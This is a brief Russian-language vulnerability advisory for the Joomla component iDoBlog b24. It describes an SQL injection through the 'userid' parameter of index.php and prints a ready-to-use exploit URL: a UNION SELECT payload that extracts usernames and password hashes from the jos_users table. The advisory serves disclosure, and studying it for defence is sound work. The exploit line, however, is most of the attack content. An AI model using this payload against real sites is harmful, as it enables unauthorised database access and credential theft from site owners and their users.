Программа: Joomla Component iDoBlog b24

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре «userid» сценарием index.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.

Эксплоит:

index.php?option=com_idoblog&task=userblog&userid={SQL}

/index.php?option=com_idoblog&task=userblog&userid=<valid_userid> and 1=1
UNION SELECT user(),user(),user(),user(),user(),concat(username,0x3a,password),
user(),user(),user(),user(),user(),user(),user(), user(),user(),user() FROM
jos_users—



Оставить мнение